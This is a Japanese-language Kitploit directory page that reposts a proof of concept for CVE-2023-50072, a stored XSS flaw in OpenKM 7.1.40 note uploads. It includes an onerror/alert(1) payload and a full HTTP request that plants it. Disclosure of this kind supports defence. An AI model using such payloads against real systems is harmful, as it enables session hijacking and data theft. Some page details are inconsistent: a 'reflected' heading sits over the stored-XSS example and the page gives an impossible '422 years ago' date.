Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-50072 — OpenKM バージョン 7.1.40 には、保存型クロスサイトスクリプティング (XSS) の脆弱性が存在します。 | Kitploit
ツール/GitHubGitHub/ahrixia/cve-2023-50072
脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテスト
GitHubahrixia/cve-2023-50072

CVE-2023-50072

OpenKM バージョン 7.1.40 には、保存型クロスサイトスクリプティング (XSS) の脆弱性が存在します。

リポジトリを見る
422年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2023-50072

OpenKM バージョン 7.1.40 (dbb6e88) Professional Extension には、ストアドクロスサイトスクリプティング(XSS)の脆弱性が存在します。この脆弱性により、認証済みユーザーがファイルにノートをアップロードし、そのノートがストアドXSSペイロードとして機能します。ドキュメントファイルのノートを開いたユーザーは誰でもXSSがトリガーされます。

脆弱性のあるパラメータ: text

エクスプロイト - 概念実証(POC)

反射型クロスサイトスクリプティング(XSS)

root@kitploit:~
ペイロード :  
最終ペイロード(URLエンコード) : <image/src/onerror%3dalert(1)>

[http://localhost/openkm/rest/note/nodes/NODE-ID] へのGETリクエスト:

root@kitploit:~
POST /openkm/rest/note/nodes/34bc430a-e3db-4efa-8289-3d0894010f67 HTTP/2
Host: EXAMPLE.COM
Cookie: lang=en-GB; JSESSIONID=EC6EF7B1DB85C3A839C9D3054095AA8E
Content-Length: 23
Sec-Ch-Ua: "Chromium";v="117", "Not;A=Brand";v="8"
X-Requested-App: kcenter
Sec-Ch-Ua-Mobile: ?0
Authorization: OKM ey[REDACTED]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/plain, */*
Sec-Ch-Ua-Platform: "Windows"
Origin: https://EXAMPLE.COM
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://EXAMPLE.COM/openkm
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

text=<image/src/onerror%3dalert(1)>

影響

ストアドXSSにより、攻撃者は悪意のあるスクリプトをWebアプリケーションに注入でき、そのスクリプトは保存され、他のユーザーが影響を受けるページを表示した際に実行されます。これにより、機密情報の窃取、セッションハイジャック、マルウェアの配布などが発生する可能性があります。

スクリーンショット

openkm

その他の動作するペイロード

root@kitploit:~
ペイロード : 
最終ペイロード(URLエンコード) : 
ツールをダウンロード